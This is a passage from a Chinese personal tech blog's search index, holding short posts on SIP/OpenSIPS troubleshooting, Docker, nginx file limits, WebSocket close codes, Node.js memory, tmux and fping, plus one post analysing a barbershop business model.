","title":"一方听不到另外一方的声音"},{"content":"在通话接近30秒时,呼叫自动挂断。\n有很大的可能和丢失了ACK有关。这个需要用sngrep去抓包看SIP时序图来确定是否是ACK丢失。\n丢失ACK的原因很大可能是NAT没有处理好,或者是网络协议不匹配等等。\n","permalink":"https://wdd.js.org/opensips/ch7/30-seconds-drop/","summary":"在通话接近30秒时,呼叫自动挂断。\n有很大的可能和丢失了ACK有关。这个需要用sngrep去抓包看SIP时序图来确定是否是ACK丢失。\n丢失ACK的原因很大可能是NAT没有处理好,或者是网络协议不匹配等等。","title":"30秒自动挂断"},{"content":"exec user process caused \u0026#34;no such file or directory\u0026#34; 解决方案: 将镜像构建的 Dockerfile ENTRYPOINT [\u0026quot;/run.sh\u0026quot;] 改为下面的\nENTRYPOINT [\u0026#34;sh\u0026#34;,\u0026#34;/run.sh\u0026#34;] 其实就是加了个sh\n","permalink":"https://wdd.js.org/posts/2020/07/docker-exec-user-process/","summary":"exec user process caused \u0026#34;no such file or directory\u0026#34; 解决方案: 将镜像构建的 Dockerfile ENTRYPOINT [\u0026quot;/run.sh\u0026quot;] 改为下面的\nENTRYPOINT [\u0026#34;sh\u0026#34;,\u0026#34;/run.sh\u0026#34;] 其实就是加了个sh","title":"exec user process caused no such file or directory"},{"content":"function report(msg:string){ var img = new Image() img.src = `/report?log=${msg}` } report ","permalink":"https://wdd.js.org/posts/2020/07/koow4y/","summary":"function report(msg:string){ var img = new Image() img.src = `/report?log=${msg}` } report ","title":"使用image标签上传日志"},{"content":"python Flask框架报错。刚开始我只关注了这个报错,没有看到这个报错上面还有一个报错\nModuleNotFoundError: No module named \u0026#39;http.client\u0026#39;; \u0026#39;http\u0026#39; is not a package 实际上问题的关键其实是 'http' is not a package , 为什么会有这个报错呢?\n其实因为我自己在项目目录里新建一个叫做http.py的文件,这个文件名和python的标准库重名了,就导致了后续的一系列的问题。\n问题总结 文件名一定不要和某些标准库的文件名相同 排查问题的时候,一定要首先排查最先出现问题的点 ","permalink":"https://wdd.js.org/posts/2020/07/ncigfk/","summary":"python Flask框架报错。刚开始我只关注了这个报错,没有看到这个报错上面还有一个报错\nModuleNotFoundError: No module named \u0026#39;http.client\u0026#39;; \u0026#39;http\u0026#39; is not a package 实际上问题的关键其实是 'http' is not a package , 为什么会有这个报错呢?\n其实因为我自己在项目目录里新建一个叫做http.py的文件,这个文件名和python的标准库重名了,就导致了后续的一系列的问题。\n问题总结 文件名一定不要和某些标准库的文件名相同 排查问题的时候,一定要首先排查最先出现问题的点 ","title":"ModuleNotFoundError: 
No module named 'SocketServer'"},{"content":"iTerm我已经使用了很长时间了,总体各方面的特点都非常好,但是有几个地方也是让我苦恼的地方。\ntab 页面的标题会根据执行的命令或者路径发生变化,如果你开了七八个ssh远程,有时候很难区分这个tab页面到底是连接的哪台机器。 如果你有十几个机器需要连接,你不可能手动输入ssh root@ip地址的方式去连接,太多了记不住。 如何维护多个远程host? 使用profile维护多个远程host, 每个profile对应连接到一台机器。profile name填入该host的名字。\n注意右边的Command, Send text at start的输入框,这个输入框,就是要执行的ssh指令,里面包含了远程host的地址。\n然后你就可以在Profiles的菜单中选择一个profile进行连接了。\n如何让tab页面的标题不改变? 一定不要勾选Applications in terminal may change the title, 默认这项是勾选的。 Title一定要选择Name, badge的妙用? 如果标签页的tab的名称还不够强调当前tab页面是连接哪个标签页面的,你可以用Badge去强调一下。\n","permalink":"https://wdd.js.org/posts/2020/06/ba84a7/","summary":"iTerm我已经使用了很长时间了,总体各方面的特点都非常好,但是有几个地方也是让我苦恼的地方。\ntab 页面的标题会根据执行的命令或者路径发生变化,如果你开了七八个ssh远程,有时候很难区分这个tab页面到底是连接的哪台机器。 如果你有十几个机器需要连接,你不可能手动输入ssh root@ip地址的方式去连接,太多了记不住。 如何维护多个远程host? 使用profile维护多个远程host, 每个profile对应连接到一台机器。profile name填入该host的名字。\n注意右边的Command, Send text at start的输入框,这个输入框,就是要执行的ssh指令,里面包含了远程host的地址。\n然后你就可以在Profiles的菜单中选择一个profile进行连接了。\n如何让tab页面的标题不改变? 一定不要勾选Applications in terminal may change the title, 默认这项是勾选的。 Title一定要选择Name, badge的妙用? 
如果标签页的tab的名称还不够强调当前tab页面是连接哪个标签页面的,你可以用Badge去强调一下。","title":"iTerm2技巧 维护多个host与固定tab页面标题"},{"content":" 首先去官网查看一下,macos的系统版本和硬件以及ipad的版本是否支持随航。这是前提条件。 macos 和 ipad 需要登录同一个AppleID macos和iPad需要在同一个Wi-Fi下 遇到报错提示连接超时时:\nMacOS 退出apple账号,然后重新登录,登录完了之后重启电脑 再次尝试连接,就可以连接成功了。\n","permalink":"https://wdd.js.org/posts/2020/06/yh0oty/","summary":"首先去官网查看一下,macos的系统版本和硬件以及ipad的版本是否支持随航。这是前提条件。 macos 和 ipad 需要登录同一个AppleID macos和iPad需要在同一个Wi-Fi下 遇到报错提示连接超时时:\nMacOS 退出apple账号,然后重新登录,登录完了之后重启电脑 再次尝试连接,就可以连接成功了。","title":"MacOS 随航功能连接ipad超时"},{"content":"macos 升级后,发现git等命令都不可用了。\n第一次使用xcode-select --install, 有报错。于是就用brew 安装了git。\nxcode-select --install 后续使用其他命令时,发现gcc命令也不可用。于是第二天又用 xcode-select --install 执行了一遍,忽然又可以正常安装开发软件了。\n所以又把brew 安装的git给卸载了。\n","permalink":"https://wdd.js.org/posts/2020/06/wetv3e/","summary":"macos 升级后,发现git等命令都不可用了。\n第一次使用xcode-select --install, 有报错。于是就用brew 安装了git。\nxcode-select --install 后续使用其他命令时,发现gcc命令也不可用。于是第二天又用 xcode-select --install 执行了一遍,忽然又可以正常安装开发软件了。\n所以又把brew 安装的git给卸载了。","title":"xcrun: error: invalid active developer path"},{"content":"最近遇到一个问题,WebSocket总是会在下午出现比较大的断开的量。\n首先怀疑的是客户端的网络到服务端的网络出现抖动或者断开,要么就是入口的nginx有异常,或者是内部的服务出现异常。\n排查下来,发现nginx的最大打开文件个数是1024\nnginx master进程\nnginx work进程\n当进程打开文件数超过限制时,会发生什么? 当进程超过最大打开文件限制时,会收到SIGXFSZ信号。这个信号的默认行为是杀死进程。进程内部也可以捕获这个信号。\n我试着向nginx work进程发送SIGXFSZ信号, work进程会退出,然后master监听了这个事件后,会重新启动一个work进程。\nkill -XFSZ work_pid 在nginx的error.log文件中,可以看到类似的日志输出。\n这里的25就是XFSZ信号的整数表示。\n... [alert] ...#.: work process ... 
exited on signal 25 _\n参考 https://www.monitis.com/blog/6-best-practices-for-optimizing-your-nginx-performance/ https://www.cnblogs.com/shansongxian/p/9989631.html https://www.cnblogs.com/jpfss/p/9755706.html https://man7.org/linux/man-pages/man2/getrlimit.2.html https://man7.org/linux/man-pages/man5/proc.5.html ","permalink":"https://wdd.js.org/posts/2020/06/rlmqq8/","summary":"最近遇到一个问题,WebSocket总是会在下午出现比较大的断开的量。\n首先怀疑的是客户端的网络到服务端的网络出现抖动或者断开,要么就是入口的nginx有异常,或者是内部的服务出现异常。\n排查下来,发现nginx的最大打开文件个数是1024\nnginx master进程\nnginx work进程\n当进程打开文件数超过限制时,会发生什么? 当进程超过最大打开文件限制时,会收到SIGXFSZ信号。这个信号的默认行为是杀死进程。进程内部也可以捕获这个信号。\n我试着向nginx work进程发送SIGXFSZ信号, work进程会退出,然后master监听了这个事件后,会重新启动一个work进程。\nkill -XFSZ work_pid 在nginx的error.log文件中,可以看到类似的日志输出。\n这里的25就是XFSZ信号的整数表示。\n... [alert] ...#.: work process ... exited on signal 25 _\n参考 https://www.monitis.com/blog/6-best-practices-for-optimizing-your-nginx-performance/ https://www.cnblogs.com/shansongxian/p/9989631.html https://www.cnblogs.com/jpfss/p/9755706.html https://man7.org/linux/man-pages/man2/getrlimit.2.html https://man7.org/linux/man-pages/man5/proc.5.html ","title":"生产环境nginx配置"},{"content":"调研目的 在异常情况下,网络断开对WebSocket的影响 测试代码 测试代码没有心跳机制 心跳机制并不包含在WebSocket协议内部 var ws = new WebSocket(\u0026#39;wss://echo.websocket.org/\u0026#39;) ws.onopen =function(e){ console.log(\u0026#39;onopen\u0026#39;) } ws.onerror = function (e) { console.log(\u0026#39;onerror: \u0026#39; + e.code) console.log(e) } ws.onclose = function (e) { console.log(\u0026#39;onclose: \u0026#39; + e.code) console.log(e) } 场景1: 断网后,是否会立即触发onerror, 或者onclose事件? 答案:不会立即触发\n测试代码中没有心跳机制,断网后,并不会立即触发onerror或者onclose的回调函数。\n个人测试的情况\n机器 测试场景 Macbook pro chrome 83.0.4103.106 每隔10秒发送一次消息的情况下,40秒后触发onclose事件 Macbook pro chrome 83.0.4103.106 一直不发送消息,一直就不会触发onclose事件 Macbook pro chrome 83.0.4103.106 发出一个消息后? 场景2: 断网后,使用send()发送数据,会触发事件吗? 为什么无法准确拿到断开原因? WebSocket关闭事件中有三个属性\ncode 断开原因码 reason 具体原因 wasClean 是否是正常断开 官方文档上,code字段有很多个值。但是大多数情况下,要么拿到的值是undefined, 要么是1006,基本上没有其他情况。\n这并不是浏览器的bug, 这是浏览器故意这样做的。在w3c的官方文档上给出的原因其实是出于安全的考虑。\n试想一下,如果把断开原因给出得非常具体。那么一个恶意的js脚本就有可能做端口扫描或者恶意的注入。\nUser agents must not convey any failure information to scripts in a way that would allow a script to distinguish the following situations:\nA server whose host name could not be resolved.\nA server to which packets could not successfully be routed.\nA server that refused the connection on the specified port.\nA server that failed to correctly perform a TLS handshake (e.g., the server certificate can\u0026rsquo;t be verified).\nA server that did not complete the opening handshake (e.g. because it was not a WebSocket server).\nA WebSocket server that sent a correct opening handshake, but that specified options that caused the client to drop the connection (e.g. the server specified a subprotocol that the client did not offer).\nA WebSocket server that abruptly closed the connection after successfully completing the opening handshake.\nIn all of these cases, the WebSocket connection close code would be 1006, as required by the WebSocket Protocol specification. [WSP]\nAllowing a script to distinguish these cases would allow a script to probe the user\u0026rsquo;s local network in preparation for an attack. https://www.w3.org/TR/websockets/%23concept-websocket-close-fail\n","permalink":"https://wdd.js.org/posts/2020/06/sbhglg/","summary":"调研目的 在异常情况下,网络断开对WebSocket的影响 测试代码 测试代码没有心跳机制 心跳机制并不包含在WebSocket协议内部 var ws = new WebSocket(\u0026#39;wss://echo.websocket.org/\u0026#39;) ws.onopen =function(e){ console.log(\u0026#39;onopen\u0026#39;) } ws.onerror = function (e) { console.log(\u0026#39;onerror: \u0026#39; + e.code) console.log(e) } ws.onclose = function (e) { console.log(\u0026#39;onclose: \u0026#39; + e.code) console.log(e) } 场景1: 断网后,是否会立即触发onerror, 或者onclose事件? 答案:不会立即触发\n测试代码中没有心跳机制,断网后,并不会立即触发onerror或者onclose的回调函数。\n个人测试的情况\n机器 测试场景 Macbook pro chrome 83.0.4103.106 每隔10秒发送一次消息的情况下,40秒后触发onclose事件 Macbook pro chrome 83.0.4103.106 一直不发送消息,一直就不会触发onclose事件 Macbook pro chrome 83.0.4103.106 发出一个消息后? 场景2: 断网后,使用send()发送数据,会触发事件吗? 为什么无法准确拿到断开原因? WebSocket关闭事件中有三个属性\ncode 断开原因码 reason 具体原因 wasClean 是否是正常断开 官方文档上,code字段有很多个值。但是大多数情况下,要么拿到的值是undefined, 要么是1006,基本上没有其他情况。","title":"[未完成] WebSocket调研"},{"content":"一般的sip网关同时具有信令和媒体处理的能力,如下图。\n但是也有信令和媒体分开的网关。在和网关信令交互过程中,网关会将媒体地址放到sdp中。\n难点就来了,在nat存在的场景下,你并不知道sdp里的媒体地址是否是真实的地址。\n那么你就要选择,是相信sdp中的媒体地址,还是把sip信令的源ip作为媒体地址呢?\n","permalink":"https://wdd.js.org/opensips/ch1/sip-rtp-path/","summary":"一般的sip网关同时具有信令和媒体处理的能力,如下图。\n但是也有信令和媒体分开的网关。在和网关信令交互过程中,网关会将媒体地址放到sdp中。\n难点就来了,在nat存在的场景下,你并不知道sdp里的媒体地址是否是真实的地址。\n那么你就要选择,是相信sdp中的媒体地址,还是把sip信令的源ip作为媒体地址呢?","title":"媒体路径与信令路径"},{"content":"1. 简介 媒体协商用来交换呼叫双方的媒体能力。如\n支持的编码类型有哪些 采样频率是多少 媒体端口,ip 信息 \u0026hellip; 媒体协商使用的是请求和应答模型。即一方向另一方发送含有 sdp 信息的消息,然后另一方根据对方提供的编码以及自己支持的编码,如果协商成功,则将协商后的消息 sdp 再次发送给对方。\n2. 常见的几个协商方式 2.1 在 INVITE 中 offer 2.2 在 200 OK 中 offer 2.3 在 UPDATE 中 offer 2.4 在 PRACK 中 offer 3. 常见的几个问题 一般呼叫到中继侧时,中继回的 183 信令是会携带 sdp 信息的 一般打到分机时,分机回的 180 信令是没有 sdp 信息的 不要先入为主的认为,某些请求一定带有 sdp,某些请求一定没有 sdp。而应当去测试请求或者响应消息上有没有携带 sdp 信息。\n携带 sdp 信息的 sip 消息会出现下面的头\nContent-Type: application/sdp ","permalink":"https://wdd.js.org/opensips/ch1/offer-answer/","summary":"1. 简介 媒体协商用来交换呼叫双方的媒体能力。如\n支持的编码类型有哪些 采样频率是多少 媒体端口,ip 信息 \u0026hellip; 媒体协商使用的是请求和应答模型。即一方向另一方发送含有 sdp 信息的消息,然后另一方根据对方提供的编码以及自己支持的编码,如果协商成功,则将协商后的消息 sdp 再次发送给对方。\n2. 常见的几个协商方式 2.1 在 INVITE 中 offer 2.2 在 200 OK 中 offer 2.3 在 UPDATE 中 offer 2.4 在 PRACK 中 offer 3. 常见的几个问题 一般呼叫到中继侧时,中继回的 183 信令是会携带 sdp 信息的 一般打到分机时,分机回的 180 信令是没有 sdp 信息的 不要先入为主的认为,某些请求一定带有 sdp,某些请求一定没有 sdp。而应当去测试请求或者响应消息上有没有携带 sdp 信息。\n携带 sdp 信息的 sip 消息会出现下面的头\nContent-Type: application/sdp ","title":"媒体协商 offer/answer模型"},{"content":"Decode As Udp wireshark 有时候并不能把udp包识别为rtp包,所以这边可能需要手动设置解码方式\n","permalink":"https://wdd.js.org/opensips/tools/wireshark-player-pcap/","summary":"Decode As Udp wireshark 有时候并不能把udp包识别为rtp包,所以这边可能需要手动设置解码方式","title":"wireshark 播放抓包文件"},{"content":"新建一个文件 ip.list.cfg, 包含所有的待测试的ip地址。\n192.168.40.20 192.168.40.21 执行命令:\nnohup fping -D -u -l -p 2000 -f ip.list.cfg \u0026amp; -D 显示时间戳 -u 显示不可达的目标 -l 持续的ping -p 每隔多少毫秒执行一次 -f 指定ip列表文件 在nohup.out中,会持续的显示到各个ip的网络状况。\n[1592643928.961414] 192.168.40.20 : [0], 84 bytes, 3.22 ms (3.22 avg, 0% loss) [1592643928.969987] 192.168.40.21 : [0], 84 bytes, 1.22 ms (1.22 avg, 0% loss) [1592643930.965753] 192.168.40.20 : [1], 84 bytes, 5.25 ms (4.23 avg, 0% loss) [1592643930.972833] 192.168.40.21 : [1], 84 bytes, 1.14 ms (1.18 avg, 0% loss) [1592643932.965636] 192.168.40.20 : [2], 84 bytes, 3.45 ms (3.97 avg, 0% loss) [1592643932.978245] 192.168.40.21 : [2], 84 bytes, 4.39 ms (2.25 avg, 0% loss) [1592643934.991354] 192.168.40.20 : [3], 84 bytes, 27.9 ms (9.96 avg, 0% loss) [1592643934.991621] 192.168.40.21 : [3], 84 bytes, 14.9 ms (5.42 avg, 0% loss) [1592643936.978135] 192.168.40.20 : [4], 84 bytes, 11.3 ms (10.2 avg, 0% loss) [1592643936.979620] 192.168.40.21 : [4], 84 bytes, 1.37 ms (4.61 avg, 0% loss) ","permalink":"https://wdd.js.org/posts/2020/06/qtdzvr/","summary":"新建一个文件 ip.list.cfg, 包含所有的待测试的ip地址。\n192.168.40.20 192.168.40.21 执行命令:\nnohup fping -D -u -l -p 2000 -f ip.list.cfg \u0026amp; -D 显示时间戳 -u 显示不可达的目标 -l 持续的ping -p 每隔多少毫秒执行一次 -f 指定ip列表文件 在nohup.out中,会持续的显示到各个ip的网络状况。\n[1592643928.961414] 192.168.40.20 : [0], 84 bytes, 3.22 ms (3.22 avg, 0% loss) [1592643928.969987] 192.168.40.21 : [0], 84 bytes, 1.22 ms (1.22 avg, 0% loss) [1592643930.965753] 192.168.40.20 : [1], 84 bytes, 5.25 ms (4.23 
avg, 0% loss) [1592643930.972833] 192.168.40.21 : [1], 84 bytes, 1.14 ms (1.","title":"fping 网络状态监控测试"},{"content":".zshrc配置 vim ~/.zshrc plugins=(git tmux) # 加入tmux, 然后保存退出 source ~/.zshrc tmux 快捷键 Alias Command Description ta tmux attach -t Attach new tmux session to already running named session tad tmux attach -d -t Detach named tmux session ts tmux new-session -s Create a new named tmux session tl tmux list-sessions Displays a list of running tmux sessions tksv tmux kill-server Terminate all running tmux sessions tkss tmux kill-session -t Terminate named running tmux session tmux _zsh_tmux_plugin_run Start a new tmux session ","permalink":"https://wdd.js.org/posts/2020/06/rh9zsc/","summary":".zshrc配置 vim ~/.zshrc plugins=(git tmux) # 加入tmux, 然后保存退出 source ~/.zshrc tmux 快捷键 Alias Command Description ta tmux attach -t Attach new tmux session to already running named session tad tmux attach -d -t Detach named tmux session ts tmux new-session -s Create a new named tmux session tl tmux list-sessions Displays a list of running tmux sessions tksv tmux kill-server Terminate all running tmux sessions tkss tmux kill-session -t Terminate named running tmux session tmux _zsh_tmux_plugin_run Start a new tmux session ","title":"oh-my-zsh 安装 tmux插件"},{"content":"GC释放时机 当HeapUsed接近最大堆内存时,触发GC释放。 下图是深夜,压力比较小的时候。 下图是上午工作时间\n内存泄漏 OOM ","permalink":"https://wdd.js.org/fe/nodejs-gc-times/","summary":"GC释放时机 当HeapUsed接近最大堆内存时,触发GC释放。 下图是深夜,压力比较小的时候。 下图是上午工作时间\n内存泄漏 OOM ","title":"Nodejs Gc Times"},{"content":"","permalink":"https://wdd.js.org/posts/2020/06/elg2v2/","summary":"","title":"Nodejs诊断报告"},{"content":"process.memoryUsage() { rss: 4935680, heapTotal: 1826816, heapUsed: 650472, external: 49879, arrayBuffers: 9386 } heapTotal 和 heapUsed指向V8\u0026rsquo;s 内存使用 external 指向 C++ 对象的内存使用, C++对象绑定js对象,并且由V8管理 rss, 实际占用内存,包括C++, js对象和代码三块的总计。使用 ps aux命令输出时,rss的值对应了RSS列的数值 arrayBuffers, node js 所有buffer占用的内存 heapTotal and heapUsed refer to V8\u0026rsquo;s memory usage. 
external refers to the memory usage of C++ objects bound to JavaScript objects managed by V8. rss, Resident Set Size, is the amount of space occupied in the main memory device (that is a subset of the total allocated memory) for the process, including all C++ and JavaScript objects and code. arrayBuffers refers to memory allocated for ArrayBuffers and SharedArrayBuffers, including all Node.js Buffers. This is also included in the external value. When Node.js is used as an embedded library, this value may be 0 because allocations for ArrayBuffers may not be tracked in that case. process.resourceUsage() userCPUTime maps to ru_utime computed in microseconds. It is the same value as process.cpuUsage().user. systemCPUTime maps to ru_stime computed in microseconds. It is the same value as process.cpuUsage().system. maxRSS maps to ru_maxrss which is the maximum resident set size used in kilobytes. sharedMemorySize maps to ru_ixrss but is not supported by any platform. unsharedDataSize maps to ru_idrss but is not supported by any platform. unsharedStackSize maps to ru_isrss but is not supported by any platform. minorPageFault maps to ru_minflt which is the number of minor page faults for the process, see this article for more details. majorPageFault maps to ru_majflt which is the number of major page faults for the process, see this article for more details. This field is not supported on Windows. swappedOut maps to ru_nswap but is not supported by any platform. fsRead maps to ru_inblock which is the number of times the file system had to perform input. fsWrite maps to ru_oublock which is the number of times the file system had to perform output. ipcSent maps to ru_msgsnd but is not supported by any platform. ipcReceived maps to ru_msgrcv but is not supported by any platform. signalsCount maps to ru_nsignals but is not supported by any platform. 
voluntaryContextSwitches maps to ru_nvcsw which is the number of times a CPU context switch resulted due to a process voluntarily giving up the processor before its time slice was completed (usually to await availability of a resource). This field is not supported on Windows. involuntaryContextSwitches maps to ru_nivcsw which is the number of times a CPU context switch resulted due to a higher priority process becoming runnable or because the current process exceeded its time slice. This field is not supported on Windows. console.log(process.resourceUsage()); /* Will output: { userCPUTime: 82872, systemCPUTime: 4143, maxRSS: 33164, sharedMemorySize: 0, unsharedDataSize: 0, unsharedStackSize: 0, minorPageFault: 2469, majorPageFault: 0, swappedOut: 0, fsRead: 0, fsWrite: 8, ipcSent: 0, ipcReceived: 0, signalsCount: 0, voluntaryContextSwitches: 79, involuntaryContextSwitches: 1 } */ ","permalink":"https://wdd.js.org/fe/nodejs-mem-usage/","summary":"process.memoryUsage() { rss: 4935680, heapTotal: 1826816, heapUsed: 650472, external: 49879, arrayBuffers: 9386 } heapTotal 和 heapUsed指向V8\u0026rsquo;s 内存使用 external 指向 C++ 对象的内存使用, C++对象绑定js对象,并且由V8管理 rss, 实际占用内存,包括C++, js对象和代码三块的总计。使用 ps aux命令输出时,rss的值对应了RSS列的数值 node js 所有buffer占用的内存 heapTotal and heapUsed refer to V8\u0026rsquo;s memory usage. external refers to the memory usage of C++ objects bound to JavaScript objects managed by V8. 
rss, Resident Set Size, is the amount of space occupied in the main memory device (that is a subset of the total allocated memory) for the process, including all C++ and JavaScript objects and code.","title":"Nodejs Mem Usage"},{"content":"v8内存模型 Code Segment: 代码被实际执行 Stack 本地变量 指向引用的变量 流程控制,例如函数 Heap V8负责管理 HeapTotal 堆的总大小 HeapUsed 实际使用的大小 Shallow size of an object: 对象自身占用的内存 Retained size of an object: 对象及其依赖对象删除后回释放的内存 ","permalink":"https://wdd.js.org/fe/nodejs-memory-model/","summary":"v8内存模型 Code Segment: 代码被实际执行 Stack 本地变量 指向引用的变量 流程控制,例如函数 Heap V8负责管理 HeapTotal 堆的总大小 HeapUsed 实际使用的大小 Shallow size of an object: 对象自身占用的内存 Retained size of an object: 对象及其依赖对象删除后回释放的内存 ","title":"Nodejs Memory Model"},{"content":"从各种层次排查了问题,包括\ndocker版本不一样 脚本不一样 镜像的问题 \u0026hellip; 从各种角度排查过后,却发现,问题在是拼写错误。环境变量没有设置对,导致进程无法前台运行。\n能不拼写就不要拼写!!直接复制。\n大文件在传输图中可能会文件损坏,最好使用md5sum计算文件校验和,然后做对比。\n","permalink":"https://wdd.js.org/posts/2020/06/ghpbm9/","summary":"从各种层次排查了问题,包括\ndocker版本不一样 脚本不一样 镜像的问题 \u0026hellip; 从各种角度排查过后,却发现,问题在是拼写错误。环境变量没有设置对,导致进程无法前台运行。\n能不拼写就不要拼写!!直接复制。\n大文件在传输图中可能会文件损坏,最好使用md5sum计算文件校验和,然后做对比。","title":"解决问题的最后一个思路:拼写错误!!"},{"content":" webrtc的各种demo https://webrtc.github.io/samples/ 在线音频处理 https://audiomass.co/ 值得深入阅读,关于如何demo的思考 https://kitsonkelly.com/posts/deno-is-a-browser-for-code/ 不错的介绍demo的博客 https://kitsonkelly.com/posts js如何获取音频视频 https://www.webdevdrops.com/en/how-to-access-device-cameras-with-javascript/ bats可以用来测试shell脚本 https://github.com/bats-core/bats-core 手绘风格的流程图 https://excalidraw.com/ ","permalink":"https://wdd.js.org/posts/2020/06/gbm9n6/","summary":" webrtc的各种demo https://webrtc.github.io/samples/ 在线音频处理 https://audiomass.co/ 值得深入阅读,关于如何demo的思考 https://kitsonkelly.com/posts/deno-is-a-browser-for-code/ 不错的介绍demo的博客 https://kitsonkelly.com/posts js如何获取音频视频 https://www.webdevdrops.com/en/how-to-access-device-cameras-with-javascript/ bats可以用来测试shell脚本 https://github.com/bats-core/bats-core 手绘风格的流程图 https://excalidraw.com/ ","title":"01 
手绘风格的流程图"},{"content":"用法 Parameter What does it do? ${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value. ${VAR:?STRING} Display an error if empty or unset. ${VAR?STRING} Display an error if unset. 例子 执行下面的例子,如果环境变量中 CONF 的值存在,则取 CONF 的值,否则用默认值 7\n#/bin/bash a=${CONF:-\u0026#34;7\u0026#34;} echo $a; ","permalink":"https://wdd.js.org/shell/default-var/","summary":"用法 Parameter What does it do? ${VAR:-STRING} If VAR is empty or unset, use STRING as its value. ${VAR-STRING} If VAR is unset, use STRING as its value. ${VAR:=STRING} If VAR is empty or unset, set the value of VAR to STRING. ${VAR=STRING} If VAR is unset, set the value of VAR to STRING. ${VAR:+STRING} If VAR is not empty, use STRING as its value. ${VAR+STRING} If VAR is set, use STRING as its value.","title":"设置变量默认值"},{"content":"1. 理发店分类 类别 店面大小 并发理发人数 业务范围 消费者画像 定价 A(单一理发类) 较小 4-6 理发、染发、烫发 学生、普通工人 较低 B(综合服务类) 较大 12-20 理发、染发、烫发、美容、减肥、刮痧、按摩、脱毛等等 白领、老板等有一定经济能力者 中上 2. 如何吸引顾客上门? 优惠卡:在理发店营业之前,往往可以以极低的价格,派发理发卡。例如办理20元理发5次这样的理发卡。这样在理发店营业之初,就会有足够的客户上门理发。 认知偏差:很多理发店会门口挂个横幅: x+x+x 仅需5元。全场套餐仅需1折。其实这些都是吸引顾客的钩子,而真正的前提条件,往往是要办理xxxx元的会员卡。 3. 如何吸引客户更多的消费? 对于B类理发店来说,一般情况下顾客进店之后,并不会对其立即理发。而需要一位服务员进行理发前的准备,例如头部按摩、颈部刮痧、肩部按摩的放松准备。也可能会上一些茶水,糖果瓜子之类的食品。\n进入理发店,除了有理发的消费之外,还可能纯在其他的消费机会。而消费机会的前提在于**服务人员和顾客之间的沟通。所以以为能够察言寡色的服务员则显得尤为重要。如果顾客一句话也不说,那也是无法让其更多的消费的。常见的沟通手法如下:\n发现顾客身上的小瑕疵,进而咨询顾客是否需要专业的人员帮您看看。(注意这一步一定不要立即推荐套餐服务,这样会立即引起顾客的反感情绪。) 经过专业人员的查看之后,一般会向客户推荐比较优惠的体验一次的项目。因为体验一次往往是话费比较小的。如果上来给客户推荐一两千的套餐,客户一般会拒绝。 简单的套餐体验过后,可以向顾客推荐套餐,以及如果使用套餐,单次理疗会更加优惠。 总得理念就是:循序渐诱,不可操之过急\n4. 如何留住顾客? 理发店顾客粘性一般比较小,周围四五家理发店,顾客凭什么再次光顾你这家呢?\n答案就是:会员卡\n","permalink":"https://wdd.js.org/posts/2020/05/frut12/","summary":"1. 
理发店分类 类别 店面大小 并发理发人数 业务范围 消费者画像 定价 A(单一理发类) 较小 4-6 理发、染发、烫发 学生、普通工人 较低 B(综合服务类) 较大 12-20 理发、染发、烫发、美容、减肥、刮痧、按摩、脱毛等等 白领、老板等有一定经济能力者 中上 2. 如何吸引顾客上门? 优惠卡:在理发店营业之前,往往可以以极低的价格,派发理发卡。例如办理20元理发5次这样的理发卡。这样在理发店营业之初,就会有足够的客户上门理发。 认知偏差:很多理发店会门口挂个横幅: x+x+x 仅需5元。全场套餐仅需1折。其实这些都是吸引顾客的钩子,而真正的前提条件,往往是要办理xxxx元的会员卡。 3. 如何吸引客户更多的消费? 对于B类理发店来说,一般情况下顾客进店之后,并不会对其立即理发。而需要一位服务员进行理发前的准备,例如头部按摩、颈部刮痧、肩部按摩的放松准备。也可能会上一些茶水,糖果瓜子之类的食品。\n进入理发店,除了有理发的消费之外,还可能纯在其他的消费机会。而消费机会的前提在于**服务人员和顾客之间的沟通。所以以为能够察言寡色的服务员则显得尤为重要。如果顾客一句话也不说,那也是无法让其更多的消费的。常见的沟通手法如下:\n发现顾客身上的小瑕疵,进而咨询顾客是否需要专业的人员帮您看看。(注意这一步一定不要立即推荐套餐服务,这样会立即引起顾客的反感情绪。) 经过专业人员的查看之后,一般会向客户推荐比较优惠的体验一次的项目。因为体验一次往往是话费比较小的。如果上来给客户推荐一两千的套餐,客户一般会拒绝。 简单的套餐体验过后,可以向顾客推荐套餐,以及如果使用套餐,单次理疗会更加优惠。 总得理念就是:循序渐诱,不可操之过急\n4. 如何留住顾客? 理发店顾客粘性一般比较小,周围四五家理发店,顾客凭什么再次光顾你这家呢?\n答案就是:会员卡","title":"理发店的营业模式分析"},{"content":"opensips 1.x 使用各种flag去设置一个呼叫是否需要记录。从opensips 2.2开始,不再使用flag的方式,而使用 do_accounting() 函数去标记是否需要记录呼叫。\n注意 do_accounting()函数并不是收到SIP消息后立即写呼叫记录,也仅仅是做一个标记。实际的写数据库或者写日志发生在事务或者dialog完成的时候。\n","permalink":"https://wdd.js.org/opensips/ch6/acc/","summary":"opensips 1.x 使用各种flag去设置一个呼叫是否需要记录。从opensips 2.2开始,不再使用flag的方式,而使用 do_accounting() 函数去标记是否需要记录呼叫。\n注意 do_accounting()函数并不是收到SIP消息后立即写呼叫记录,也仅仅是做一个标记。实际的写数据库或者写日志发生在事务或者dialog完成的时候。","title":"acc呼叫记录模块"},{"content":"# # this example shows how to use forking on failure # log_level=3 log_stderror=1 listen=192.168.2.16 # ------------------ module loading ---------------------------------- #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; # Uncomment this if you want to use SQL database loadmodule \u0026#34;tm.so\u0026#34; loadmodule \u0026#34;sl.so\u0026#34; loadmodule \u0026#34;maxfwd.so\u0026#34; # ------------------------- request routing logic ------------------- # main routing logic route{ # initial sanity checks -- messages with # max_forwards==0, or excessively long requests if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many 
